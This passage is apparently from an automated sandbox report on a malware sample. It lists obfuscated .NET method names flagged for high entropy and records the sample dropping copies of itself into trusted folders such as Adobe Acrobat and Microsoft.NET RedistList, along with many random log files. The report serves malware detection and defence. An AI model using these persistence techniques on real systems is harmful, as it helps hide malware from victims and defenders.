Source: yQrCGtNgsf.exe, B4hGUV8FaTlDUySXuOs.cs	High entropy of concatenated method names: 'UgvFMq4aOQl6GSAC28Vn', 'CtEGVL4acLsKowQmGEs4', 'pNmu2K4aClCA0uuNySup', 'LwEqIHYB0U', 'S3i0AK4aDSWffE2PMccG', 'qBV04n4aTabiSNgLSuvj', 't0uow04aWrc1E4y6XTfS', 'Fl0rRR4aLZjsl0ocERMp', 'TdaA6N4ajSQQUAIEK7B2', 'ph414VoyEF'
Source: yQrCGtNgsf.exe, uCy6m6ORMgvECyajo0F.cs	High entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'gi7OSbuP5E', 'jtUOJKqxvt', 'Dispose', 'D31', 'wNK'
Source: yQrCGtNgsf.exe, n1jjWg4I9rXwsi1ypeN.cs	High entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'Q634v4RlmHx', 'iA44k4PU8kY', 'g8XPNc4rZi6HEK4fTPL9', 'ubs6y84rI3gGn3hDyrZc', 'G9UhPD4rzwBwjmeoyTMg', 'WUIDuN4TXI3d7d3L5Cdx'
Source: yQrCGtNgsf.exe, cRnhvHF5rGeeCJkN3mm.cs	High entropy of concatenated method names: 'yAfFhxsI6T', 'VeVFdF5fTP', 'KQBFitiWxF', 'QixFf5sUTp', 't11F2YxwAX', 'AGYWVn4RPavrg2akGCB3', 'WweqYy4RS1pcLi4WdEB6', 'ojxPbr4RJa10jhxhbF55', 'fj0GmR4RuHkI7rxIMQaa', 'rpqptI4RtkpWxmLnVDdw'
Source: yQrCGtNgsf.exe, N4OS4em8lGP5qKq375S.cs	High entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'IGY4vm6geP1', 'iA44k4PU8kY', 'VStFQt4L3fIQTgPXg4dF', 'yVkAb84LnkHPay2hwo62', 'mZx2pf4LqbfCjiOoWdKr', 'F8hSQ44L1nJvcT115mU9'
Source: yQrCGtNgsf.exe, BtvZ1qLvdXYhGk5yj57.cs	High entropy of concatenated method names: 'leILHn0fJH', 'YUkLbg3bvk', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'obvL3aSxJ3', 'method_2', 'uc7'
Source: yQrCGtNgsf.exe, gflDllmQP962YM7q1h4.cs	High entropy of concatenated method names: 'q64', 'P9X', 'APv4kqcxRc1', 'vmethod_0', 'cPw4vMdIctO', 'imethod_0', 'wwkhes4LRYU1Qhafb9FK', 'zgPkRy4LAuO3jMUNpwF1', 'RHdDL74LSJooYDqKE1Vi', 'xFvgMe4LJ6NT7qNUCyM4'
Source: yQrCGtNgsf.exe, kiStgPzypIPEDZhJly.cs	High entropy of concatenated method names: 'Unn447mPCd', 'Qu14eRkkIU', 'uPe4kjxZSJ', 'R6y4mBRmjX', 'IEj4M58PuF', 'Qm14YuHDAF', 'aGB48FvyOt', 'U3EaUL4rmjQDBkCQDDRX', 'HMkXc14rM7O3RYygmZJ0', 'W9Hh0Z4rY0B5VaX6DA37'
Source: yQrCGtNgsf.exe, qlnK6kjldNEr9VbZJ8B.cs	High entropy of concatenated method names: 'aTdyqGv88u', 'O2ZGy94tESg2qjSyBprX', 'O46vLI4t6kDEajPxvstf', 'kt5', 's4FjVugWl1', 'ReadByte', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'Suz'
Source: yQrCGtNgsf.exe, Gbku6wet8FFPdbS2QFq.cs	High entropy of concatenated method names: 'MvqkeRK7OL', 'twqkkAhadr', 'DPIkmt429I', 'm7xkAo4D4OkPP54lgMRr', 'GDpuGp4DKpADWR9tYDp7', 'SscyeR4WzubgUwlxR71G', 'DEjZ1v4DXIXsXZMQVmb2', 't10kbjtXEG', 'uUC5Rj4DM4otdGadJwSL', 'AWPQ274DkStZPWGK9OkA'
Source: yQrCGtNgsf.exe, ocGqqPKsFPu8S9FbWau.cs	High entropy of concatenated method names: 'H0HKNlRSNN', 'poTKVjyS8J', 'U6fTpO4TFDwUigAKH1eY', 'TSrqE54TNGWrp5F406Gv', 'tfcv7K4TVRM4rHv7WJkA', 'CDXuwP4TOISTHjcRZtFE', 'gs9CV64TcAWlmNYdqGNw', 'NDSq3C4TCMw6igP8R9Re', 'H5OwGx4TroXOYkjLunlJ'
Source: yQrCGtNgsf.exe, jZiYygCb3ioJ9l4smRm.cs	High entropy of concatenated method names: 'h1FCnfpWeJ', 'tBaCqA6VXh', 'HqVC1iCm0Q', 'jUCC0Tkjwd', 'EdfCGXIeJK', 'lbiPCu4SvtImF3caPe9w', 'Qjjw0u4SMBphamNrRLlN', 'ombI3f4SYnPLxcCH1RPo', 'UwAm524S8pnBf5TxIrPf', 'Yd6Jyv4SH430ahE7k7b1'
Source: yQrCGtNgsf.exe, updinnfqtsdCXK42ewU.cs	High entropy of concatenated method names: 'x5WKm3cweMc', 'iGVEZF42SGAf1uvtvlVC', 'zpqL2642JqB6wMEx3l5f', 'gwRypO42PIxsaXlUnLaS', 'nji7iv42uT3Q9gbuuD8H'
Source: yQrCGtNgsf.exe, vPu71Iw6Naxrgje5gog.cs	High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'wnIRdv4BojMUK8cXdZBh', 'XD7eVO4BG7e1GkpoRxNd', 'HWm6h54B9yARyRppA5vQ'
Source: yQrCGtNgsf.exe, HiJZHiKtL7J32rWSkwF.cs	High entropy of concatenated method names: 'nCqeYluwkF', 'wcp4S14Tf39EPX9hpon1', 'BZy2t24T2KgZ3BrUQchM', 'z49jK94TZWae6gl9bmCR', 'kRLgRu4TIFtla9XG9w7F', 'kKf9qL4TdNiMDaikCFKO', 'QCyqVk4TigS0jcNamKPp', 'wMlCfs4TzaTxCcwNDWFI', 'sWHeX6SlIx', 'jNyeKPNrX1'
Source: yQrCGtNgsf.exe, zht64Qm5oOWJci8a3OL.cs	High entropy of concatenated method names: 'XvAm2cFgUA', 'L4PmZpwy89', 'JfdmIeENRn', 'CCXmzX6h2M', 'KJnMXd1RA4', 'tbCM4fIYAO', 'jeMMKpkjaN', 'BCyiwe4jbraTNgQP1gHB', 'dX75Mx4j3rKh55PhhIu8', 'UQ4mqy4j82N0oeVgE3Ti'
Source: yQrCGtNgsf.exe, hs2CShfXyyBTUemBMgJ.cs	High entropy of concatenated method names: 'W6CfkwWLG3', 'SbCfmYQZSG', 'HoHkoZ42yy9AC9ZM4xao', 'L3nH7X42E0BBKV455xFf', 'cnUjPW426qD7BgnkyUWL', 'VD7eyX42w7YT7SChshfe', 'ejUfKOeKR5', 'FhPfPT42WCkhoZyNVp1V', 'FUBd8D42DRCMAvUtoq4M', 'e4kEIM42rHs8vyXdS0ZW'
Source: yQrCGtNgsf.exe, BtQ1L8Y7TrWReEFRRWY.cs	High entropy of concatenated method names: 'uACYiwS5hT', 'nsPYfIOsKM', 'xYXvW54yIP0JYRcUZSMC', 'kQAIyF4yz9QSANP0n4nN', 'qujYRb6a6B', 'xOsYAEIMqc', 'LWsYSM8N1b', 'LqJYJe21Xx', 'LDTYPnLgXx', 'IGfYunrSuJ'
Source: yQrCGtNgsf.exe, CU396sinmLclZkWoVQB.cs	High entropy of concatenated method names: 'zgVi0Z72XN', 'ECZiUnjM9h', 'VMAiNpX7hj', 'WW3iVp7gZb', 'VfsiFBRr1W', 'KeaiOdZ3Zy', 'Ydlic85NKO', 'LrliC2e6Uk', 'Dispose', 'H00a0W42KTeISmppVEPS'
Source: yQrCGtNgsf.exe, tJptC3M7NF85H6rjLyv.cs	High entropy of concatenated method names: 'IGJMiraZrW', 'iGjMfwPaGP', 'KEhM2DHAkd', 'YXuLPt4jZM6MLMxUFaEe', 'caySGT4jI4s5H80anGkq', 'Do1q7R4jfAiEwxGBRVhE', 'x5RXou4j25nc0jsZLYvJ', 'eLxMRdra9K', 'HHNMAh63LM', 'hKCMSHO6EC'
Source: yQrCGtNgsf.exe, G5W2Bdl0OrER3fDqqAj.cs	High entropy of concatenated method names: 'YMwbQB4gq7HpbbPy25vg', 'ODclni4g10jnaWGAfXrk', 'gvD17d4g37oB5PSjtTrb', 'D6AWTV4gnIyY08Ldmymg', 'method_0', 'method_1', 'kXFl992ByE', 'wIaloWrap7', 'm5flUYn9HO', 'vTIlsRZw7O'
Source: yQrCGtNgsf.exe, wGPoPgCLXoX7UoTrQoa.cs	High entropy of concatenated method names: 'method_0', 'dLgCyWLkiU', 'KoICEDsUPL', 'NTxC6K9AYW', 'OehCw1RIS8', 'hNSCaxsG29', 'GwXCpCYFgc', 'Oof2Ua4SUu8gQZKULnKC', 'Yyf2624S9oRbZAZ1XajA', 'ahD2NQ4SodPgBfnGfh8p'
Source: yQrCGtNgsf.exe, NZnJ7Uch43y0LspCXXU.cs	High entropy of concatenated method names: 'R5Ccix5suG', 'KJscfrdn7x', 't04c2ur8xS', 'hIKr8t4S4YMLdJoK4FAd', 'e5wvTm4AzrU3L7xcrT65', 'ynCoWY4SXYEkcf5iTPpT', 'V5R7gL4SKZWJhQ3fMn2N', 'AaM0JH4SesCKB7jenmF3', 'hbhZoR4Sk9NF1lsVxOCm'
Source: yQrCGtNgsf.exe, bT7dKtWn0qejywFIYdX.cs	High entropy of concatenated method names: 'Q3kW1K7Vig', 'qnGL9N4PXIjH5cAn18cH', 'x7XRGk4JIAjfufb32Mnv', 'AUph3p4JzYW0laB5Qs6P', 'bIjTM04P4W2F9oKMOFZu', 'Um24Sh4PKBh47UpSW83L', 'qgkh7Z4PeaTpQjAQB43o'
Source: yQrCGtNgsf.exe, sbSOuV9HKnfkdu3G1U.cs	High entropy of concatenated method names: 'dtqE4pCtb', 'vUZ8Or4CDNXkbgm6Fs9o', 'oHeOxf4CLmRE52Cirdof', 'WRPRXW4CTjXawGjXT3Ke', 'JCblj64CWKP4IUPpv3mB', 'SyFUuN83b', 'c0isKb4S0', 'GPGl5Zi4O', 'FdINsZVJc', 'icWVSQZJc'
Source: yQrCGtNgsf.exe, rgCow7y6bC51IKsoD5j.cs	High entropy of concatenated method names: 'Close', 'qL6', 'g7vyaLqsdJ', 'QZiypEWReT', 'XC4yQHBhNR', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
Source: yQrCGtNgsf.exe, jy3xodvNgelBAEGSTYT.cs	High entropy of concatenated method names: 'vuivFOqFQs', 'aTkXtB4ETyj9ME0vDxqA', 'QHFYMU4EWhaQTIBG1kGe', 'cBOKyD4EDSykB81KPnrG', 'lebNeV4ECdwkHDQhY1HU', 'xA5IQs4ErYMwR4eHu9DG', 'obg3rT4ELhA2VTAo1pbu'
Source: yQrCGtNgsf.exe, gysy46p8c9mDrVnLuVe.cs	High entropy of concatenated method names: 'AAUpOW9Jwg', 'v8y7JM4h4i2FZ5gZdKZ0', 'CtItqO4Bze0Rg4LJUhsU', 'wlsSUO4hXUMuEGXK3AYQ', 'iw6dbH4hK2b442hMYDCG', 'h21I3Q4hevWaDWhocBlD', 'IPy', 'method_0', 'method_1', 'method_2'
Source: yQrCGtNgsf.exe, zCKA0IUTlaensuHWLEY.cs	High entropy of concatenated method names: 'rqyUwsRXYW', 'c5mKyi4QZTPvfEN9kwgw', 'QwlQ5a4Qf8rg26hHjuBT', 'T8VWPA4Q251KT8dX99gr', 'DiRGNc4QInBK4FGUC6PC', 'sCTUD1AACN', 'UGgULDUn17', 'TF6UjZgvUd', 'Cp4UZb4QBR5knxNAXclI', 'f6iEoU4QhQchfCblo6KL'
Source: yQrCGtNgsf.exe, jQVaybY8eQa2CC5MamI.cs	High entropy of concatenated method names: 'UIZYbAdmlj', 'OCeY3wE2QN', 'lfcGI94yv89Txdl1Tb6P', 'Euo2SE4y8aj9jeMZY4hD', 'sJqCN54yH4EGcKQWdiY2', 'isRxd24ybJArMYUrWUIT', 'zxMq6E4y3cZJH7LSh8se', 'wnyG5S4ynVcE5GlfiKkT'
Source: yQrCGtNgsf.exe, ViTDYyvGvxKPP0bnQUV.cs	High entropy of concatenated method names: 'JB1vsyb0IV', 'YyvoDO4EOs8jPhyqqSXU', 'nKt4GM4EVrxk3YBhAoWP', 'uqA31l4EFYE82Iabme3p', 'QJ9vo532O4', 'nbIem94EUjT8nSNEp8EJ', 'NSeD8C4EsxHJu1mmhun9', 'wEdRPM4E9IcjsB0x1OYU', 'xcKsX14Eo6UaM9Onsj1x', 'uLOwth4EldasNQCTXZGu'
Source: yQrCGtNgsf.exe, v1Xh80Qf0p1u1CORBhK.cs	High entropy of concatenated method names: 'ArKQZgYykU', 'fIkQIKgZRA', 'G6ZQzAEg3R', 'jHqxXtfApZ', 'G7Ix4mfMuA', 'fLZxKlyTj0', 'rKLxee3KHN', 'pqixkCvxE2', 'VnOxmD78S7', 'gl2xM1Y7i5'
Source: yQrCGtNgsf.exe, jARLKnYU1UivcE1Hvio.cs	High entropy of concatenated method names: 'F1EYT0Q267', 'IDWlGe4yEqbWZSHCYZDn', 'RxAae84y6UAhHoGko3iN', 'zWs7Sv4yjlxOLSdQqQ7x', 'LZ1fOM4yyr3mgS87lXIe', 'hofQIk4ywXwk6iNWHPC4', 'DeRpLV4yaJlMx09b2Eo7', 'KPcYlhMVDe', 'lEsYNd8bmb', 'eRxYVf5rdG'
Source: yQrCGtNgsf.exe, U4mhPWeCn6mjApvGspQ.cs	High entropy of concatenated method names: 'YPnegWknpS', 'yjoeRWErdw', 'jXaeAHFGay', 'REhqPI4WpcdkBcR5Mumd', 'lSanMp4WQNVvjXRRwF4Z', 'L5Ko3x4WwMN7YPakX4hP', 'WN9OQ44WaGPPvjggY9Xn', 'h8teTlw3G6', 'TMLeWNtFoQ', 'EiSeDSpOCq'
Source: yQrCGtNgsf.exe, cLd8aP1bfHdCq9rvW5x.cs	High entropy of concatenated method names: 'Dispose', 'Yv01nnQ9ua', 'MKc1qUDTGX', 'GBl11TlOsD', 'Kf29Uv4aPEAqiTy2ebRT', 'NmC8An4aufrJfshkpyVt', 'N3C8P54aty5eD46WOmtS', 'WhZlWa4a5ygBaakDX1LZ', 'ibIT7T4aBnsTCAGHatSY', 'TQjia14ahMBq4aJNt6FK'
Source: yQrCGtNgsf.exe, J6PedsDIGYDr3cPRUsX.cs	High entropy of concatenated method names: 'iYsLXUGIOH', 'joGL40r3mx', 'Yd7', 'ItxLK1Bdlb', 'JekLecJMxP', 'pEOLk20p7R', 'acGLmxNb2L', 'arXBK64uQ45crjmMXtpF', 'vTCl604uxHFufGBY1a5S', 'P7bR9p4u7DdQ9PYHhbxt'
Source: yQrCGtNgsf.exe, oyFGC4r7jB8CAJ4tmsc.cs	High entropy of concatenated method names: 'BnkrZA7ZQk', 'hgArzRuAHy', 'XnwrRt9Gqm', 'jxJrAvCDeT', 'IB4rSHVED5', 'IxurJBbbdp', 'YAJrP5o5AA', 'cCSrud5HYO', 'VmIrtIbF9o', 'm3cr5L6gOg'
Source: yQrCGtNgsf.exe, UTCB7OEtLAQ8TRX3RC6.cs	High entropy of concatenated method names: 'OGEl7t45te2uym4J5Ql9', 'hLtmHG455wBLCowCtUlu', 'YQPEIk45BT0tgvrFPyej', 'bV2EBeM1xR', 'Mh9', 'method_0', 'HDuEhIn0EC', 'W95EdT8e1A', 'aycEiMbpGy', 'SFUEfyIxey'
Source: yQrCGtNgsf.exe, LCuFHWcF5jhsSaIkYU3.cs	High entropy of concatenated method names: 'MdoccAPSYU', 'p68cCaHGE4', 'f3XcrFNC4Y', 'b1lcTGjOKl', 'eUScWDskMj', 'wRxGSK4Au9pyg26CddPP', 'fhQAMh4AJLw84XI3xe6c', 'mp5KeT4APAEnexjMrRgW', 'vKKNys4AtIeKXXv8mZcv', 'HZ5ImK4A5cLvQNyLYIuF'
Source: yQrCGtNgsf.exe, OPvCaFUh3IZvLKrSEwe.cs	High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'NMV4vnL3PW6', 'Wow4kSmKIxZ', 'hSh7jE4xqFeEtJCiOSVP', 'PxGAtP4x1WmHdRVAXFdX', 'mX1tkb4x0AIXxRVGc0qi', 'qKuSLK4xGcx4Ywlco4KM', 'JaKPLb4x9YOnMHOqA1y3'
Source: yQrCGtNgsf.exe, T1krChiLy9W2KE4m3B4.cs	High entropy of concatenated method names: 'Pjeiy5Pt2N', 'a9GiExTZPs', 'uxYi6UYOUh', 'CsCiwjnhvR', 'Dispose', 'FCIl2342bsNOqiG863RN', 'cE9EOY428eMptx9vxJTy', 'k8cReD42HxgMrdAyAVkp', 'BCJ8Lt423ha8tm1lpwsR', 'EadmCm42nsEvJFRujb0o'
Source: yQrCGtNgsf.exe, N96j8IQLGkiECP4I06i.cs	High entropy of concatenated method names: 'RQnQy6nK6l', 'RJ5QE0quoe', 'xn8Q66dJnE', 'eXCQwPwC73', 'TRNQaX4kCq', 'Ds5QpvOwet', 'vkKQQekp1N', 'j6TQxQFOO6', 'AN0Q73eX25', 'krXQg989nW'
Source: yQrCGtNgsf.exe, YV7vTgf9a9Ets2qr8Kd.cs	High entropy of concatenated method names: 'cG6vjM42dsQLrT63LpVZ', 'r2d5VC42iQg6reP9Uo3o', 'R3P2hOXTT3', 'eXh2Xo42IXB0iFyoXdAj', 'BSyLlq42zWdaE4nodJ2E', 'h65eTK4ZXJH3q3nMwxmU', 'SBp8j64Z4FOl5nrF5vkb', 'H0EkkY4ZKIdlPxMTnK2b', 'vmeE2T4ZenXf9AD9DGmo', 'DkvQwc4ZkVVCp5llUFes'
Source: yQrCGtNgsf.exe, kyZiO71VWBjLmoCWjKv.cs	High entropy of concatenated method names: 'EVXUnuKmhU', 'J9XUqX22tM', 'qJqmiH4Q67ttvuGgGrgd', 'oEFoci4Qy2WilrG2NpOu', 'GaV9mr4QEmx4si1NVd0g', 'E4xYVA4QwWiQ1wULttjk', 'em5jE54QanQ9Lg2sFufA', 'YasUUErIbn', 'AA55kY4Q7EgK3qqsfijG', 'FXomjv4QQcFNLa9qsfQx'
Source: yQrCGtNgsf.exe, Ufys8FUpnNgh1KIOvw6.cs	High entropy of concatenated method names: 'pCyUSn9KIt', 't6JUJPb7Bx', 'dCEUP4crEO', 'ryBnbC4xmVpj181lCoPf', 'Eeh0hI4xMJWHpDVRjRpM', 'i5Dkhu4xeIS5dru3VVoI', 'Ne9QeE4xkEYcvjIn07M3', 'JreUxvIiJ5', 'XrMU7DXiHc', 'vCEUg6pLVZ'
Source: yQrCGtNgsf.exe, FQ2eTyWLWOmdIgWVmC3.cs	High entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
Source: yQrCGtNgsf.exe, B0FWVsDAD0QxqILTyH0.cs	High entropy of concatenated method names: 'eTTDJGcvUA', 'DmgDPjR5Vw', 'KoaDuC5tbb', 'fgHDtL18u5', 'hmxD5SYSm1', 'gFntj04uTfvyb7BO9pxj', 'EK6d054uWVVoPFhgFggE', 'Xnm49p4uCdYK8bdACJhk', 'KYEsfT4urKc6jV1qx3Wu', 'XmUnqU4uD2D8ScqPIkx3'
Source: yQrCGtNgsf.exe, Ces4gbytSgEFnQyWEBM.cs	High entropy of concatenated method names: 'quJyBpYrZ9', 'k6r', 'ueK', 'QH3', 'nrsyhjE4cK', 'Flush', 'ABJydKUr4J', 'decyisCaG6', 'Write', 'ujQyfpNi3s'
Source: yQrCGtNgsf.exe, wIsYM7Km5NXn0TDhZlS.cs	High entropy of concatenated method names: 'rT8KYEcChp', 'rPYKvoRFYY', 'iLMK8EBOWt', 'fvUKHfJ6Va', 'QRIl5U4TnI8btD9xgKyc', 'kRks6R4TbnYlkAj8mPfa', 'dNbhdI4T3kWOlbHtPCBe', 'DlSA7K4Tquex2kIhmlwL', 'F61Sm34T1xPsDlptPsih', 'PGV9GQ4T0PhEa0stTeey'
Source: yQrCGtNgsf.exe, YDG8IOhLo1WqtkweBn1.cs	High entropy of concatenated method names: 'method_0', 'h59', 'R73', 'Qp7hyb3PI9', 'QGFsrY4icAKg0bI6e445', 'kGaqN34iC1FbMDGRWSKY', 'T6bWtM4irB5riJbOl2UW', 'R5hiRb4iTUIM7YUC06Vw', 'oWHwQB4iW2jaaQRxoJ73', 'L1xACH4iDIdWRwni8kdU'
Source: yQrCGtNgsf.exe, VA678lvrnnvSlUK7FZ6.cs	High entropy of concatenated method names: 'elUvWKHqyM', 'w1AvDuNNbL', 'VFcvLis4CE', 'py3vjivxuO', 'SVHvyABprK', 'dPIvECBrmC', 'U98bNb4Epd99xZl9T5V7', 'W1d9na4EQaX8APDQvRgw', 'GpsXZX4ExVSSD2t17vDU', 'rhuA2S4E7Aq2KwrrClGi'
Source: yQrCGtNgsf.exe, spDAHXkQOrYnihspdJg.cs	High entropy of concatenated method names: 'hBpkZriy8i', 'C8dCfk4DzqShhwb4E85o', 'Pqtghk4DZoMwBFg5vNHp', 'fg1xVq4DI6Xl47dYXRnq', 'sAaiSr4LXKxB3sM6R5kT', 'WdORDX4LkQEHf1FZJIY3', 'dbJH3V4LKjOoHv6ulaqf', 'DbrvIL4LetukskVmPvdu', 'nDOKNh4LmNE0nvLMUpi7', 'JZ4mMmbGb4'
Source: yQrCGtNgsf.exe, P90gNMkjDSGOHUusEBe.cs	High entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'FBx4vkWooTx', 'iA44k4PU8kY', 'AS91ao4DW8eLORXrf2jr', 'yW1DpI4DDMZYDWMF1d6i', 'blihRc4DLGJW6dlMuebQ', 'Bk8fOd4DjslXFeMsyRCb', 'pfrQn14DyACwLjCEQ0vW'
Source: yQrCGtNgsf.exe, esmLp7wfbx0ZaFp6lpy.cs	High entropy of concatenated method names: 'b76', 'method_0', 'q7Q', 'K41', 'vEh', 'pu6', 'Xk4', 'K81', 'YV4', 'method_1'
Source: yQrCGtNgsf.exe, mVb93mreQt359Nmt1U5.cs	High entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'YCHrm1KYJM', 'Write', 'Vr8rM4vgZk', 'BLirYYfMwg', 'Flush', 'vl7'
Source: yQrCGtNgsf.exe, TW5v7oTBAAHdPUVsKnl.cs	High entropy of concatenated method names: 'DuYTdKmxMG', 'vOVTir34gs', 'trbTfrCvWf', 'Q4MT26YB5N', 'iwqTZcuLAR', 'vM9Ebp4JpYBQyvcMSYYP', 'iTVjAY4JwaBn9po5yuGN', 'mLfeJq4JaJMGNuNvZMko', 'a8m8OO4JQJmk9LO4gd6X', 'TC4rkN4JxRWs1bU5mi7F'
Source: yQrCGtNgsf.exe, D01LQ8pAcivABjr9hY8.cs	High entropy of concatenated method names: 'zia4vOJTAob', 'AYbpJRIpCt', 'iVRpPLax75', 'gA7puFgc8g', 'mmtAds4hq3sgNNpvY5U3', 'nX6AET4h1TXr2tikwrRK', 'L9acUu4h0WbRh21DiuKJ', 'h2j6584hGS958CumSFnN', 'BPphPj4h9op4fwAodYCC', 'A9r3nE4hogwcSl6oceH2'

Persistence and Installation Behavior

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe

File written: C:\Program Files\Adobe\Acrobat DC\JPOyDhPFIytu.exe

Jump to behavior

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File created: C:\Users\user\Desktop\pLpTuJYH.log	Jump to dropped file
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File created: C:\Users\user\Desktop\apDEhkEl.log	Jump to dropped file
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File created: C:\Users\user\Desktop\yuIieleo.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\zuWaRqDn.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\VnZQnlzb.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\LCrhcYww.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\BDesMBdT.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\KRjbfmWU.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\fXYUxCDX.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\OzAXPueG.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\RfcHRSFf.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\pGrkhfIF.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\HPxsKDSZ.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\oxAuScwr.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\FTTrxXjd.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\cyaNQADQ.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\mvOMxtrw.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\NkPigQpK.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\VjLFuzVH.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\RdNoqiHi.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\waJkCVMY.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\nzBVHGUq.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\vlAbNuev.log	Jump to dropped file
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File created: C:\Recovery\JPOyDhPFIytu.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\WTjyQsvs.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\SKvXgoIi.log	Jump to dropped file
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File created: C:\Program Files\Uninstall Information\JPOyDhPFIytu.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\eReVdbbp.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\IjLZavdG.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\MAAYLQkP.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\UkLxLBCd.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\dUDNIbMu.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\TLlpvaAw.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\eWtfXNEJ.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\lmQBfErr.log	Jump to dropped file
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File created: C:\Users\user\Desktop\TzzXjEkC.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\KZthgyKJ.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\TADrPPcC.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\GJcAmyRG.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\zdFkvbcm.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\gcAWdtGq.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File created: C:\Users\user\Desktop\edjwtIzh.log	Jump to dropped file
